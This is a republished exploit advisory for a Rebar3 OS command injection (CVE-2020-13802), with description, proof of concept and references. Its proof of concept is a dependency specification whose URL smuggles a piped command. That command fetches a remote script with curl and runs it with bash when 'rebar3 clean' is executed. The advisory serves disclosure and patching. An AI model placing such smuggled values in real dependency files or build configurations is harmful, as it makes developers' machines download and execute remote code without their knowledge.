Rebar3 3.13.2 Command Injection ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on September 2nd, 2020 📆 | 2152 Views ⚑

0

Rebar3 3.13.2 Command Injection ≈ Packet Storm

# Exploit Title: Rebar3 – OS command injection
# Date: 2020-06-03
# Exploit Author: Alexey Pronin (vulnbe)
# Vendor Homepage: https://rebar3.org
# Software Link: https://github.com/erlang/rebar3
# Versions affected: 3.0.0-beta.3 – 3.13.2
# CVE: CVE-2020-13802

1. Description:
———————-

Rebar3 versions 3.0.0-beta.3 to 3.13.2 are vulnerable to OS command injection via URL parameter of dependency specification.

2. Proof of Concept:
———————-

* Add dependency with any of the following specification:

{
‘dephelper’, “.*”, {
hg, “https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:[email protected]&ctx=channel|curlt-fsSLthttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|basht-|gittclonethttps://github.com/vulnbe/poc-rebar3-helper.git”,
“dephelper”}
}

or

{
‘poc_rebar3’, “.*”, {
git, “https://github.com/vulnbe/poc-rebar3.git”
}
}

* Execute command: rebar3 clean

References
———————-
* [Rebar3 vulnerability analysis](https://vuln.be/post/rebar3-command-injection/)
* [POC](https://github.com/vulnbe/poc-rebar3.git)
* [Vulnerability remediation PR](https://github.com/erlang/rebar3/pull/2302)
* [CVE-2020-13802](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13802)

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...